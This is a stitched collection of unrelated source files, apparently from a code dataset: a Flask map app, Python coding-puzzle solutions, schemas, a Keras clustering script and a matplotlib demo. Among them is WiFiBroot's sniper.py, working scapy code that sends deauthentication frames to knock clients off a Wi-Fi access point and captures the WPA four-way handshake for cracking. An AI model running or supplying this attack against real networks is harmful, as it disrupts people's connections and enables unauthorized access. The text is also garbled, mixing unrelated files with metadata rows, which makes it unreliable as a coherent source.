from flask import Flask, request, session, g, redirect, url_for, abort, render_template, flash
app = Flask(__name__)
app.config.from_object(__name__)
# read configuration file from the environment variable and get the access key
app.config.from_envvar('APP_CONFIG_FILE', silent=True)
# MAPBOX_ACCESS_KEY = app.config['MAPBOX_ACCESS_KEY']
# geo-coordinate points along the route
ROUTE = [
{"lat": 52.523, "long": 13.413, 'name': 'Berlin', 'admin1code': ''},
{"lat": 52.401, "long": 13.049, 'name': 'Potsdam'},
{"lat": 52.122, "long": 11.619, 'name': 'Magdeburg'},
{"lat": 51.050, "long": 13.739, 'name': 'Dresden'},
{"lat": 50.986, "long": 11.002, 'name': 'Erfurt'},
{"lat": 48.133, "long": 11.567, 'name': 'Muenchen'},
{"lat": 48.783, "long": 9.183, 'name': 'Stuttgart'},
{"lat": 50.100, "long": 8.233, 'name': 'Wiesbaden'},
{"lat": 50.000, "long": 8.267, 'name': 'Mainz'},
{"lat": 49.233, "long": 7.000, 'name': 'Saarbruecken'},
{"lat": 51.233, "long": 6.783, 'name': 'Duesseldorf'},
{"lat": 52.383, "long": 9.733, 'name': 'Hannover'},
{"lat": 53.083, "long": 8.817, 'name': 'Bremen'},
{"lat": 53.567, "long": 10.033, 'name': 'Hamburg'},
{"lat": 54.333, "long": 10.133, 'name': 'Kiel'},
{"lat": 53.628, "long": 11.412, 'name': 'Schwerin'},
]
YEARS=["WS_1998_99",
"WS_1999_00",
"WS_2000_01",
"WS_2001_02",
"WS_2002_03",
"WS_2003_04",
"WS_2004_05",
"WS_2005_06",
"WS_2006_07",
"WS_2007_08",
"WS_2008_09",
"WS_2009_10",
"WS_2010_11",
"WS_2011_12",
"WS_2012_13",
"WS_2013_14",
"WS_2014_15",
"WS_2015_16",
"WS_2016_17"]
# This is the template for the API call:
# https://api.mapbox.com/directions/v5/mapbox/driving/{GEO_COORDINATES_LIST}.json?access_token={MAPBOX_ACCESS_TOKEN}&overview=full&geometries=geojson
# Mapbox driving direction API call
# ROUTE_URL = "https://api.mapbox.com/directions/v5/mapbox/driving/{0}.json?access_token={1}&overview=full&geometries=geojson"
#
# # create the API URL with all of our geo-coordinates and the Mapbox access token
# def create_route_url():
# # Create a string with all the geo coordinates
# lat_longs = ";".join(["{0},{1}".format(point["long"], point["lat"]) for point in ROUTE])
# # Create a url with the geo coordinates and access token
# url = ROUTE_URL.format(lat_longs, MAPBOX_ACCESS_KEY)
#
# return url
#
# # use requests to run the API request and return the results as a GeoJSON object
# def get_route_data():
# # Get the route url
# route_url = create_route_url()
# # Perform a GET request to the route API
# result = requests.get(route_url)
# # Convert the return value to JSON
# data = result.json()
#
# # Create a geo json object from the routing data
# geometry = data["routes"][0]["geometry"]
# route_data = Feature(geometry = geometry, properties = {})
#
# return route_data
with open('data/geo_germany.geojson') as data_file:
state_geo = json.load(data_file)
df = pd.read_excel('data/students_bundesland_gender_foreigner_ws1998_99_ws2016_17.xlsx')
ws_1998_99 = df[df.Semester == 'WS_1998_99']
ws_1999_00 = df[df.Semester == 'WS_1999_00']
ws_2000_01 = df[df.Semester == 'WS_2000_01']
m = folium.Map(location=[52, 13], tiles="Openstreetmap",
zoom_start=6)
st_data = ws_1999_00
# print(st_data)
# print(st_data['Insgesamt, Insgesamt'].min(), st_data['Insgesamt, Insgesamt'].max())
def create_choropleth(geo_data, data, columns, legend, bins):
m.choropleth(
geo_data=geo_data,
name='choropleth',
data=data,
columns=columns,
key_on='feature.properties.NAME_1',
fill_color='OrRd',
fill_opacity=0.7,
line_opacity=0.2,
legend_name=legend,
bins=bins,
highlight=True
    )
    # Re-save the map after every update so that changes triggered from the
    # route are actually written to templates/map.html.
    m.save(outfile='templates/map.html')
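    # Map.choropleth() is folium's legacy API; newer folium versions expose
    # roughly the same options via a class instead, e.g.:
    #   folium.Choropleth(geo_data=geo_data, data=data, columns=columns,
    #                     key_on='feature.properties.NAME_1', ...).add_to(m)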
# for point in range(0, len(coords)):
# m.add_child(folium.Marker(location=coords[point], popup=folium.Popup('Hi')))
folium.LayerControl().add_to(m)
m.save(outfile='templates/map.html')
# route to the new template and send value from url
@app.route('/map/')
@app.route('/map/<year>')
def mapbox_js(year='WS_1998_99'):
# route_data = get_route_data()
df_year = df[df.Semester == year]
print('year:', year)
print(df_year['Insgesamt, Insgesamt'].min(), df_year['Insgesamt, Insgesamt'].max())
create_choropleth(geo_data=state_geo, data=df_year, columns=['Bundesland', 'Insgesamt, Insgesamt'],
legend='Studentenanzahl',
bins=[df_year['Insgesamt, Insgesamt'].min(), 100000, 200000, 300000, 400000,
df_year['Insgesamt, Insgesamt'].max() + 1])
return render_template('index.html', year=year, years=YEARS)
| 34.134752 | 149 | 0.654893 |
56d097d3b8d7980630a156980f25c5b15df2d9da
| 6,432 |
py
|
Python
|
WiFiBroot-master/wireless/sniper.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
WiFiBroot-master/wireless/sniper.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
WiFiBroot-master/wireless/sniper.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
from scapy.sendrecv import sniff
from scapy.sendrecv import sendp
from scapy.config import conf
from scapy.layers.dot11 import Dot11
from scapy.layers.dot11 import RadioTap
from scapy.layers.dot11 import Raw
from scapy.layers.dot11 import Dot11Deauth
from utils import org
import signal
import sys
import time
import threading
import binascii
import os
try:
from scapy.layers.dot11 import EAPOL
except ImportError:
from scapy.layers.eap import EAPOL
class Sniper:
__SNIFFER_STATUS = False
__CONNECTECD_CL = {}
__CL_COUNTER = {}
__c_HANDSHAKE = [0, 0, 0, 0]
__c_TGT = ''
out__ = ['333300000016', '3333ff9ddffd', 'ffffffffffff', '01005e7ffffa', '333300000001', '01005e0000fb']
def __init__(self, iface_instance, bssid, essid, channel, timeout, pully, verbose):
self.iface_instance = iface_instance
self.iface = self.iface_instance.iface
self.bssid = bssid
self.essid = essid
self.ch = channel
self.timeout = timeout
self.pull = pully
self.verbose = verbose
#self.channel_shifter = self.channel_shifter(self.ch)
def __str__(self):
return self.essid
def channel_shifter(self, ch):
self.iface_instance.stop_hopper = 1
while not self.iface_instance._interface__STATUS_END:
time.sleep(1)
self.iface_instance.shift_channel(ch)
def cl_generator(self):
try:
sniff(iface=self.iface, prn=self.cl_generator_replay)
raise KeyboardInterrupt
except KeyboardInterrupt:
if self.verbose:
self.pull.use("Clients %s (%s) - %s[Found %s]%s" % (self.bssid.replace(':', '').upper(), self.pull.DARKCYAN+org(self.bssid).org+self.pull.END,\
self.pull.GREEN, len(self.__CONNECTECD_CL), self.pull.END))
else:
self.pull.use("Clients %s - [Found %s]" % (self.bssid.replace(':', '').upper(), len(self.__CONNECTECD_CL)))
def cl_generator_replay(self, pkt):
        if pkt.haslayer(Dot11) and pkt.getlayer(Dot11).type == 2 and not pkt.haslayer(EAPOL):  # type 2 == data frame
__sn = pkt.getlayer(Dot11).addr2
__rc = pkt.getlayer(Dot11).addr1
if __sn == self.bssid and not (__sn.replace(':', '').lower() in self.out__):
try:
if self.__CL_COUNTER[__rc] > 1:
self.__CONNECTECD_CL[__rc] = self.dbM(pkt)
else:
self.__CL_COUNTER[__rc] += 1
except KeyError:
self.__CL_COUNTER[__rc] = 1
if self.verbose:
self.pull.info("Station %s (%s) %s<>%s %s (%s) %s[Data Frame]%s" % (__rc.replace(':', '').upper(), \
self.pull.DARKCYAN+org(__rc).org+self.pull.END, self.pull.RED, self.pull.END, \
__sn.replace(':', '').upper(), self.pull.DARKCYAN+org(__sn).org+self.pull.END, self.pull.YELLOW, self.pull.END))
else:
self.pull.info("Station %s %s<>%s %s %s[Data Frame]%s" % (__rc.replace(':', '').upper(), self.pull.RED, self.pull.END, \
__sn.replace(':', '').upper(), self.pull.YELLOW, self.pull.END))
elif __rc == self.bssid and not (__rc.replace(':', '').lower() in self.out__):
try:
if self.__CL_COUNTER[__sn] > 1:
self.__CONNECTECD_CL[__sn] = self.dbM(pkt)
else:
self.__CL_COUNTER[__sn] += 1
except KeyError:
self.__CL_COUNTER[__sn] = 1
if self.verbose:
self.pull.info("Station %s (%s) %s<>%s %s (%s) %s[Data Frame]%s" % (__rc.replace(':', '').upper(), \
self.pull.DARKCYAN+org(__rc).org+self.pull.END, self.pull.RED, self.pull.END, \
__sn.replace(':', '').upper(), self.pull.DARKCYAN+org(__sn).org+self.pull.END, self.pull.YELLOW, self.pull.END))
else:
self.pull.info("Station %s %s<>%s %s %s[Data Frame]%s" % (__rc.replace(':', '').upper(), self.pull.RED, self.pull.END, \
__sn.replace(':', '').upper(), self.pull.YELLOW, self.pull.END))
def clients(self):
pwr__ = []
LIT__ = {self.bssid: []}
for cl, pwr in self.__CONNECTECD_CL.items():
pwr__.append(pwr)
pwr__ = sorted(pwr__, reverse=True)
for pwr in pwr__:
for tuple_ in self.__CONNECTECD_CL.items():
if tuple_[1] == pwr:
if not tuple_[0].startswith('33:33:') or not tuple_[0].startswith('ff:ff:'):
LIT__[self.bssid].append(tuple_)
return LIT__
    def dbM(self, pkt):
        # Extract the received signal strength (dBm) from the RadioTap
        # header's undecoded bytes; plausible values lie between -90 and -20.
        if pkt.haslayer(RadioTap):
            extra = pkt.notdecoded
            dbm_sig = -999
            for p in extra:
                p = p if isinstance(p, int) else ord(p)  # bytes iterate as ints on Python 3
                if -90 < -(256 - p) < -20:
                    dbm_sig = -(256 - p)
                    break
            return dbm_sig
def verify_handshake(self, tgt):
if 0 not in self.__c_HANDSHAKE:
if len(self.__c_HANDSHAKE):
return 1
else:
return 0
def start_eapol_sniffer(self):
try:
            self.__SNIFFER_STATUS = True
sniff(iface=self.iface, prn=self.eapol_sniffer_replay)
except ValueError:
pass
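    # The WPA 4-way handshake messages are sorted into __c_HANDSHAKE below:
    #   [0] M1: AP -> station, nonce set, MIC zero
    #   [1] M2: station -> AP, nonce set, MIC set
    #   [2] M3: AP -> station, nonce set, MIC set
    #   [3] M4: station -> AP, nonce zero, MIC set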
def eapol_sniffer_replay(self, pkt):
fNONCE = "0000000000000000000000000000000000000000000000000000000000000000"
fMIC = "00000000000000000000000000000000"
if pkt.haslayer(EAPOL):
__sn = pkt[Dot11].addr2
__rc = pkt[Dot11].addr1
to_DS = pkt.getlayer(Dot11).FCfield & 0x1 !=0
from_DS = pkt.getlayer(Dot11).FCfield & 0x2 !=0
if __sn == self.bssid:
tgt = __rc
elif __rc == self.bssid:
tgt = __sn
else:
return
if from_DS == True:
nonce = binascii.hexlify(pkt.getlayer(Raw).load)[26:90]
mic = binascii.hexlify(pkt.getlayer(Raw).load)[154:186]
if __sn == self.bssid and nonce != fNONCE and mic == fMIC:
self.__c_HANDSHAKE[0] = pkt
elif __sn == self.bssid and nonce != fNONCE and mic != fMIC:
self.__c_HANDSHAKE[2] = pkt
elif to_DS == True:
nonce = binascii.hexlify(pkt.getlayer(Raw).load)[26:90]
mic = binascii.hexlify(pkt.getlayer(Raw).load)[154:186]
if __rc == self.bssid and nonce != fNONCE and mic != fMIC:
self.__c_HANDSHAKE[1] = pkt
elif __rc == self.bssid and nonce == fNONCE and mic != fMIC:
self.__c_HANDSHAKE[3] = pkt
return
def shoot(self, tgt, deauth, _phaz_instance):
self.__c_TGT = tgt
if not self.__SNIFFER_STATUS:
sniffer_thread = threading.Thread(target=self.start_eapol_sniffer)
sniffer_thread.daemon = True
sniffer_thread.start()
while not self.__SNIFFER_STATUS:
time.sleep(1)
__pkt_to_cl = RadioTap() / Dot11(addr1=tgt, addr2=self.bssid, addr3=self.bssid) / Dot11Deauth(reason=7)
__pkt_to_ap = RadioTap() / Dot11(addr1=self.bssid, addr2=tgt, addr3=tgt) / Dot11Deauth(reason=7)
for n in range(deauth * 1):
sendp(__pkt_to_cl, iface=self.iface, count=1, verbose=False)
sendp(__pkt_to_ap, iface=self.iface, count=1, verbose=False)
if self.verify_handshake(tgt):
_phaz_instance.THEPOL = tuple(self.__c_HANDSHAKE)
| 34.767568 | 147 | 0.674751 |
a45391c6385c7498426810ce5afb1ac06b5c82be
| 181 |
py
|
Python
|
ProjectEuler_plus/euler_048.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
ProjectEuler_plus/euler_048.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
ProjectEuler_plus/euler_048.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
N = int(input().strip()) + 1
total = 0
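# pow(i, i, 10**10) computes i**i modulo 10**10 efficiently, so only the last
# ten digits are ever carried through the sum; the final slice keeps them.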
for i in range(1, N):
total += pow(i, i, 10 ** 10)
print(int(str(total)[-10:]))
| 16.454545 | 32 | 0.60221 |
74524aaeb49f0d165ce802410f4d74b67290db0b
| 151 |
py
|
Python
|
Python/Itertools/itertools_permutations.py
|
rho2/HackerRank
|
4d9cdfcabeb20212db308d8e4f2ac1b8ebf7d266
|
[
"MIT"
] | null | null | null |
Python/Itertools/itertools_permutations.py
|
rho2/HackerRank
|
4d9cdfcabeb20212db308d8e4f2ac1b8ebf7d266
|
[
"MIT"
] | null | null | null |
Python/Itertools/itertools_permutations.py
|
rho2/HackerRank
|
4d9cdfcabeb20212db308d8e4f2ac1b8ebf7d266
|
[
"MIT"
] | null | null | null |
from itertools import permutations
word, k = input().strip().split()
p = [''.join(a) for a in permutations(word, int(k))]
print('\n'.join(sorted(p)))
| 25.166667 | 52 | 0.662252 |
7458b0a76de3d48ff651eb0fde20ecf1b0cbb833
| 926 |
py
|
Python
|
schemas/problem.py
|
pushyzheng/docker-oj-web
|
119abae3763cd2e53c686a320af7f4f5af1f16ca
|
[
"MIT"
] | 2 |
2019-06-24T08:34:39.000Z
|
2019-06-27T12:23:47.000Z
|
schemas/problem.py
|
pushyzheng/docker-oj-web
|
119abae3763cd2e53c686a320af7f4f5af1f16ca
|
[
"MIT"
] | null | null | null |
schemas/problem.py
|
pushyzheng/docker-oj-web
|
119abae3763cd2e53c686a320af7f4f5af1f16ca
|
[
"MIT"
] | null | null | null |
# encoding:utf-8
save_problem_schema = {
'type': 'object',
'properties': {
'title': {'type': 'string'},
'content': {'type': 'string'},
'time_limit': {'type': 'integer'},
'memory_limit': {'type': 'integer'},
        'difficulty': {'type': 'string'},
'case_list': {'type': 'array'},
'answer_list': {'type': 'array'}
},
'required': ['title', 'content', 'time_limit', 'memory_limit', 'case_list', 'answer_list']
}
update_problem_schema = {
'type': 'object',
'properties': {
'title': {'type': 'string'},
'content': {'type': 'string'},
'time_limit': {'type': 'integer'},
'memory_limit': {'type': 'integer'}
}
}
update_cases_answers_schema = {
'type': 'object',
'properties': {
'case_list': {'type': 'array'},
'answer_list': {'type': 'array'}
},
'required': ['case_list', 'answer_list']
}
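# A minimal validation sketch, assuming the jsonschema package (these
# dictionaries follow the JSON Schema vocabulary):
#   from jsonschema import validate
#   validate(instance=payload, schema=save_problem_schema)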
| 26.457143 | 94 | 0.515119 |
7761878ba2c1c5ed6e970937a0849fc5746df656
| 327 |
py
|
Python
|
gshiw/quotes_web/manage.py
|
superlead/gsw
|
fc2bb539e3721cc554b4116b553befd653d2ec74
|
[
"MIT"
] | null | null | null |
gshiw/quotes_web/manage.py
|
superlead/gsw
|
fc2bb539e3721cc554b4116b553befd653d2ec74
|
[
"MIT"
] | null | null | null |
gshiw/quotes_web/manage.py
|
superlead/gsw
|
fc2bb539e3721cc554b4116b553befd653d2ec74
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
profile = os.environ.get('QUOTES_WEB_PROFILE', 'develop')
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "quotes_web.settings.%s" % profile)
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| 29.727273 | 87 | 0.75841 |
bb28f7ec80ef51c0ffa3ad8fac04c259d92c2d12
| 260 |
py
|
Python
|
models/__init__.py
|
pgmikhael/MLExperiments
|
d3613a70e537ea5aaa0453ddaa76938c32637c49
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
pgmikhael/MLExperiments
|
d3613a70e537ea5aaa0453ddaa76938c32637c49
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
pgmikhael/MLExperiments
|
d3613a70e537ea5aaa0453ddaa76938c32637c49
|
[
"MIT"
] | null | null | null |
from models.trained_models import Resnet18
from models.trained_models import AlexNet
from models.trained_models import VGG16
from models.trained_models import DenseNet161
from models.trained_models import Inception_v3
from models.alexnet import Vanilla_AlexNet
| 43.333333 | 46 | 0.888462 |
bb4cb190b12f8f3deca5ce966bb0c252ffa336e7
| 8,860 |
py
|
Python
|
sanity_check.py
|
koriavinash1/BioExp_Experiments
|
ea556037ed885ebbdbb4b04d43469a0b889fc112
|
[
"BSD-3-Clause"
] | 2 |
2020-11-20T04:28:18.000Z
|
2020-11-23T09:05:43.000Z
|
sanity_check.py
|
koriavinash1/BioExp_Experiments
|
ea556037ed885ebbdbb4b04d43469a0b889fc112
|
[
"BSD-3-Clause"
] | null | null | null |
sanity_check.py
|
koriavinash1/BioExp_Experiments
|
ea556037ed885ebbdbb4b04d43469a0b889fc112
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
from keras.models import load_model
import scipy.cluster.hierarchy as shc
from sklearn.cluster import AgglomerativeClustering
import sys
sys.setrecursionlimit(10**6)
import matplotlib.pyplot as plt
sys.path.append('../BioExp')
from BioExp.helpers.metrics import *
from BioExp.helpers.losses import *
from sklearn.cluster import KMeans
from sklearn.metrics import silhouette_score, davies_bouldin_score, calinski_harabasz_score, silhouette_samples
class Cluster_Characteristics:
def __init__(self, model, layer, weights = None):
self.model = load_model(model, custom_objects={'gen_dice_loss':gen_dice_loss,
'dice_whole_metric':dice_whole_metric,
'dice_core_metric':dice_core_metric,
'dice_en_metric':dice_en_metric})
        if weights is not None:
            self.model.load_weights(weights)
self.layer = layer
self.weights = self.model.get_layer(self.layer).get_weights()[0]
self.kmax = None
self.order = 1
def cluster(self, position=False, kmax = 10, km = False, order=1):
flatten_shape = self.weights.shape[0]*self.weights.shape[1]*self.weights.shape[2]
X = self.weights.reshape((flatten_shape, -1))
if position:
position = np.repeat(np.array(list(range(flatten_shape)))[:, None], self.weights.shape[-1], axis = 1)
X = X + position
X = X.transpose()
dist = self.distance_matrix(X, order)
self.scores = {'sil':[], 'cal':[], 'dav':[], 'wss':[]}
for k in range(2, kmax+1):
aggmodel = AgglomerativeClustering(n_clusters = k, affinity='precomputed', linkage='average')
self.cluster_scores(aggmodel, dist, X)
        self.kmax = np.argmax(self.scores['sil'])  # index into k = 2..kmax; the best k is self.kmax + 2
self.order = order
def cluster_scores(self, model, dist, X):
labels = model.fit_predict(dist)
self.scores['sil'].append(silhouette_score(dist, labels, metric = 'precomputed'))
self.scores['cal'].append(calinski_harabasz_score(X, labels))
self.scores['dav'].append(davies_bouldin_score(X, labels))
# try:
# kmeans = model.fit(X)
# centroids_km = model.cluster_centers_
# pred_clusters_km = model.predict(X)
# curr_sse_km = 0
# # calculate square of Euclidean distance of each point from its cluster center and add to current WSS
# for i in range(len(X)):
# curr_center_km = centroids_km[pred_clusters_km[i]]
# curr_sse_km += np.linalg.norm(X[i] - curr_center_km)**2
# self.scores['wss'].append(curr_sse_km)
# # Calculate silhouette score
# labels = model.labels_
# self.scores['sil'].append(silhouette_score(X, labels_km, metric = 'euclidean'))
def plot_dendrogram(self, X):
plt.figure(figsize=(10, 7))
plt.title("Dendrograms")
dend = shc.dendrogram(shc.linkage(X, method='ward'))
plt.show()
def distance_matrix(self, X, f):
distance_matrix = np.zeros((X.shape[0], X.shape[0]))
for i in range(X.shape[0]):
for j in range(X.shape[0]):
distance_matrix[i][j] = np.linalg.norm(X[i] - X[j], ord = f)
        return distance_matrix
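    # A vectorized sketch of the same matrix (for orders f >= 1), assuming
    # scipy is available:
    #   from scipy.spatial.distance import pdist, squareform
    #   dist = squareform(pdist(X, metric='minkowski', p=f))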
def plot_silhouette(self, position=False, kmax = 10, model=None):
flatten_shape = self.weights.shape[0]*self.weights.shape[1]*self.weights.shape[2]
X = self.weights.reshape((flatten_shape, -1))
if position:
position = np.repeat(np.array(list(range(flatten_shape)))[:, None], self.weights.shape[-1], axis = 1)
X = X + position
X = X.transpose()
dist = self.distance_matrix(X, self.order)
if self.kmax is not None:
n_clusters = self.kmax + 2
fig = plt.figure()
fig.set_size_inches(10, 5)
plt.xlim([-0.1, 0.3])
plt.ylim([0, len(X) + (n_clusters + 1) * 10])
clusterer = AgglomerativeClustering(n_clusters = n_clusters, affinity='precomputed', linkage='average')
cluster_labels = clusterer.fit_predict(dist)
silhouette_avg = silhouette_score(dist, cluster_labels, metric = 'precomputed')
print("For n_clusters =", n_clusters,
"The average silhouette_score is :", silhouette_avg)
sample_silhouette_values = silhouette_samples(dist, cluster_labels, metric = 'precomputed')
y_lower = 10
for i in range(n_clusters):
# Aggregate the silhouette scores for samples belonging to
# cluster i, and sort them
ith_cluster_silhouette_values = \
sample_silhouette_values[cluster_labels == i]
ith_cluster_silhouette_values.sort()
size_cluster_i = ith_cluster_silhouette_values.shape[0]
y_upper = y_lower + size_cluster_i
color = plt.cm.nipy_spectral(float(i) / n_clusters)
plt.fill_betweenx(np.arange(y_lower, y_upper),
0, ith_cluster_silhouette_values,
facecolor=color, edgecolor=color, alpha=0.7)
# Label the silhouette plots with their cluster numbers at the middle
plt.text(-0.05, y_lower + 0.5 * size_cluster_i, str(i))
# Compute the new y_lower for next plot
y_lower = y_upper + 10 # 10 for the 0 samples
# ax[idx].set_title("The silhouette plot for the various clusters.")
plt.xlabel("The silhouette coefficient values")
plt.ylabel("Cluster label")
# The vertical line for average silhouette score of all the values
plt.axvline(x=silhouette_avg, color="red", linestyle="--")
plt.yticks([]) # Clear the yaxis labels / ticks
# plt.xticks([-0.1, 0, 0.2, 0.4, 0.6, 0.8, 1])
plt.suptitle(("Silhouette analysis for KMeans clustering on sample data "
"with n_clusters = %d" % n_clusters),
fontsize=14, fontweight='bold')
plt.show()
else:
n_range = range(2, kmax+1)
fig, ax = plt.subplots(len(list(n_range))+1)
fig.set_size_inches(20, 60)
for n_clusters in n_range:
idx = n_clusters - list(n_range)[0]
# The 1st subplot is the silhouette plot
# The silhouette coefficient can range from -1, 1 but in this example all
# lie within [-0.1, 1]
ax[idx].set_xlim([-0.1, 1])
# The (n_clusters+1)*10 is for inserting blank space between silhouette
# plots of individual clusters, to demarcate them clearly.
ax[idx].set_ylim([0, len(X) + (n_clusters + 1) * 10])
# Initialize the clusterer with n_clusters value and a random generator
# seed of 10 for reproducibility.
clusterer = AgglomerativeClustering(n_clusters = n_clusters, affinity='precomputed', linkage='average')
cluster_labels = clusterer.fit_predict(dist)
# The silhouette_score gives the average value for all the samples.
# This gives a perspective into the density and separation of the formed
# clusters
# The silhouette_score gives the average value for all the samples.
# This gives a perspective into the density and separation of the formed
# clusters
silhouette_avg = silhouette_score(dist, cluster_labels, metric = 'precomputed')
print("For n_clusters =", n_clusters,
"The average silhouette_score is :", silhouette_avg)
# Compute the silhouette scores for each sample
sample_silhouette_values = silhouette_samples(dist, cluster_labels, metric = 'precomputed')
y_lower = 10
for i in range(n_clusters):
# Aggregate the silhouette scores for samples belonging to
# cluster i, and sort them
ith_cluster_silhouette_values = \
sample_silhouette_values[cluster_labels == i]
ith_cluster_silhouette_values.sort()
size_cluster_i = ith_cluster_silhouette_values.shape[0]
y_upper = y_lower + size_cluster_i
color = plt.cm.nipy_spectral(float(i) / n_clusters)
ax[idx].fill_betweenx(np.arange(y_lower, y_upper),
0, ith_cluster_silhouette_values,
facecolor=color, edgecolor=color, alpha=0.7)
# Label the silhouette plots with their cluster numbers at the middle
ax[idx].text(-0.05, y_lower + 0.5 * size_cluster_i, str(i))
# Compute the new y_lower for next plot
y_lower = y_upper + 10 # 10 for the 0 samples
# ax[idx].set_title("The silhouette plot for the various clusters.")
ax[idx].set_xlabel("The silhouette coefficient values")
ax[idx].set_ylabel("Cluster label")
# The vertical line for average silhouette score of all the values
ax[idx].axvline(x=silhouette_avg, color="red", linestyle="--")
ax[idx].set_yticks([]) # Clear the yaxis labels / ticks
ax[idx].set_xticks([-0.1, 0, 0.2, 0.4, 0.6, 0.8, 1])
plt.suptitle(("Silhouette analysis for KMeans clustering on sample data "
"with n_clusters = %d" % n_clusters),
fontsize=14, fontweight='bold')
plt.show()
if __name__ == "__main__":
C = Cluster_Characteristics('/home/parth/Interpretable_ML/saved_models/model_flair_scaled/model-archi.h5', 'conv2d_15',
weights = '/home/parth/Interpretable_ML/saved_models/model_flair_scaled/model-wts-flair.hdf5')
# sil, sse, cal, dav = C.cluster_scores(position = False)
# print(sil, cal, dav)
C.cluster(position=True, order = 0.1)
C.plot_silhouette(position=True, kmax=10)
| 36.163265 | 120 | 0.690745 |
7022c06f8d43d5c3c5176308f9ab5efd2575229b
| 676 |
py
|
Python
|
数据结构/NowCode/11_PrintListFromTailToHead.py
|
Blankwhiter/LearningNotes
|
83e570bf386a8e2b5aa699c3d38b83e5dcdd9cb0
|
[
"MIT"
] | null | null | null |
数据结构/NowCode/11_PrintListFromTailToHead.py
|
Blankwhiter/LearningNotes
|
83e570bf386a8e2b5aa699c3d38b83e5dcdd9cb0
|
[
"MIT"
] | 3 |
2020-08-14T07:50:27.000Z
|
2020-08-14T08:51:06.000Z
|
数据结构/NowCode/11_PrintListFromTailToHead.py
|
Blankwhiter/LearningNotes
|
83e570bf386a8e2b5aa699c3d38b83e5dcdd9cb0
|
[
"MIT"
] | 2 |
2021-03-14T05:58:45.000Z
|
2021-08-29T17:25:52.000Z
|
# Print a linked list from tail to head.
# Given a linked list, return its values from tail to head as an ArrayList.
# Linked-list node structure
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
# Print the whole list
def printChain(head):
node = head
while node:
print(node.val)
node = node.next
class Solution:
    # Return the values from tail to head, e.g. [1, 2, 3]
    def printListFromTailToHead(self, listNode):
        node = listNode
        values = []
        while node:
            values.insert(0, node.val)
            node = node.next
        return values
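    # Note: values.insert(0, ...) shifts the list on every call (O(n^2)
    # overall); appending and returning values[::-1] would be O(n).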
if __name__ == '__main__':
    # Build a linked list
l1 = ListNode(1)
l2 = ListNode(2)
l3 = ListNode(3)
l1.next = l2
l2.next = l3
    print(Solution().printListFromTailToHead(l1))
| 19.882353 | 48 | 0.578402 |
3b8ad2abcb7c1f58219df07a4e525568f15b06ca
| 1,503 |
py
|
Python
|
src/onegov/org/exports/base.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/org/exports/base.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/org/exports/base.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.org.models import Export
from onegov.town6 import _
def payment_date_paid(payment):
if not payment.paid:
return
if payment.source == 'manual':
# there is not better way to know for now
return payment.last_change
if payment.source == 'stripe_connect':
# meta-property
return payment.meta.get('payout_date')
class OrgExport(Export):
def payment_items_fields(self, payment, links, provider_title):
yield _("ID Payment Provider"), payment.remote_id
yield _("Status"), _(payment.state.capitalize())
yield _("Currency"), payment.currency
yield _("Amount"), payment.amount
yield _("Net Amount"), round(payment.net_amount, 2)
yield _("Fee"), round(payment.fee, 2)
payment_date = payment_date_paid(payment)
yield _("Payment Provider"), provider_title
yield _("Date Paid"), payment_date and payment_date.date()
yield _("References"), [l.payable_reference for l in links]
yield _("Created Date"), payment.created.date()
def ticket_item_fields(self, ticket):
ha = ticket and ticket.handler
yield _("Reference Ticket"), ticket and ticket.number
yield _("Submitter Email"), ha and ha.email
yield _("Category Ticket"), ticket and ticket.handler_code
yield _("Status Ticket"), ticket and _(ticket.state.capitalize())
yield _("Ticket decided"), ha and (
_('No') if ha.undecided else _('Yes'))
| 37.575 | 73 | 0.654025 |
8eadcfb892024242ba039e682181f3dcac243889
| 771 |
py
|
Python
|
python/en/_matplotlib/gallery/lines_bars_and_markers/masked_demo.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/_matplotlib/gallery/lines_bars_and_markers/masked_demo.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/_matplotlib/gallery/lines_bars_and_markers/masked_demo.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
lines_bars_and_markers/masked_demo.py
Matplotlib > Gallery > Lines, bars and markers > Masked Demo
https://matplotlib.org/gallery/lines_bars_and_markers/masked_demo.html#sphx-glr-gallery-lines-bars-and-markers-masked-demo-py
"""
import matplotlib.pyplot as plt
import numpy as np
x = np.arange(0, 2*np.pi, 0.02)
y = np.sin(x)
y1 = np.sin(2*x)
y2 = np.sin(3*x)
ym1 = np.ma.masked_where(y1 > 0.5, y1)
ym2 = np.ma.masked_where(y2 < -0.5, y2)
